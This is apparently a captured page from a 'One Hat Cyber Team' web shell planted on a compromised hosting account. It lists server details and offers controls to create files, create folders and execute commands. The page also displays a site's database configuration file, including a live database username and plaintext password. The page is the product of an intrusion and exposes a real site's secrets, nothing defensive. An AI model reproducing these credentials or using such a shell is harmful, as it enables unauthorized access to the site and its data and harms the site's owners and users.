One Hat Cyber Team
Your IP :
216.73.216.186
Server IP :
91.108.106.255
Server :
Linux in-mum-web1837.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64
Server Software :
LiteSpeed
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
u322583024
/
domains
/
awaha.in
/
public_html
/
View File Name :
connect.inc.php
<?php $host = 'localhost'; $dbname = 'u322583024_awaha'; $username = 'u322583024_awaha'; $password = 'AwahaSoap@2025'; try { $pdo = new PDO("mysql:host=$host;dbname=$dbname;charset=utf8mb4", $username, $password); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { error_log('Database connection error: ' . $e->getMessage()); die('Database connection failed: ' . $e->getMessage()); } ?>